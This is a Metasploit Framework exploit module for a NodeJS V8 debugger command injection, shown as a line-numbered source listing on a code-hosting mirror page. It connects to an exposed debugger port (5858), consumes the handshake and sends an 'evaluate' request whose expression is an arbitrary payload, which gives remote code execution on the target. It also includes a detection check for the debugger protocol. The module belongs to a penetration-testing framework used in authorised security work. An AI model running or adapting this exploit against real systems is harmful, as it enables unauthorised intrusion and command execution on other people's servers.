Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/nodejs_v8_debugger.rb
73672 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => "NodeJS Debugger Command Injection",

18
        'Description' => %q{

19
          This module uses the "evaluate" request type of the NodeJS V8

20
          debugger protocol (version 1) to evaluate arbitrary JS and

21
          call out to other system commands. The port (default 5858) is

22
          not exposed non-locally in default configurations, but may be

23
          exposed either intentionally or via misconfiguration.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],

27
        'References' => [

28
          [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],

29
          [ 'URL', 'https://github.com/nodejs/node/pull/8106' ]

30
        ],

31
        'Targets' => [

32
          ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],

33
        ],

34
        'Privileged' => false,

35
        'DisclosureDate' => '2016-08-15',

36
        'DefaultTarget' => 0,

37
        'Notes' => {

38
          'Reliability' => UNKNOWN_RELIABILITY,

39
          'Stability' => UNKNOWN_STABILITY,

40
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

41
        }

42
      )

43
    )

44


45
    register_options(

46
      [

47
        Opt::RPORT(5858)

48
      ]

49
    )

50
  end

51


52
  def make_eval_message

53
    msg_body = {

54
      seq: 1,

55
      type: 'request',

56
      command: 'evaluate',

57
      arguments: {

58
        expression: payload.encoded,

59
        global: true,

60
        maxStringLength: -1

61
      }

62
    }.to_json

63
    msg_header = MESSAGE_HEADER_TEMPLATE % { :length => msg_body.length }

64
    msg_header + msg_body

65
  end

66


67
  def check

68
    connect

69
    res = sock.get_once

70
    disconnect

71


72
    return Exploit::CheckCode::Unknown('V8 debugger protocol not detected') unless res

73


74
    if res.include? "V8-Version" and res.include? "Protocol-Version: 1"

75
      vprint_status("Got debugger handshake:\n#{res}")

76
      return Exploit::CheckCode::Appears('Node.js V8 debugger protocol detected')

77
    end

78


79
    Exploit::CheckCode::Unknown('V8 debugger protocol not detected')

80
  end

81


82
  def exploit

83
    connect

84
    # must consume incoming handshake before sending payload

85
    buf = sock.get_once

86
    msg = make_eval_message

87
    print_status("Sending #{msg.length} byte payload...")

88
    vprint_status("#{msg}")

89
    sock.put(msg)

90
    buf = sock.get_once

91


92
    if buf.include? '"command":"evaluate","success":true'

93
      print_status("Got success response")

94
    elsif buf.include? '"command":"evaluate","success":false'

95
      print_error("Got failure response: #{buf}")

96
    else

97
      print_error("Got unexpected response: #{buf}")

98
    end

99
  end

100


101
end

102


103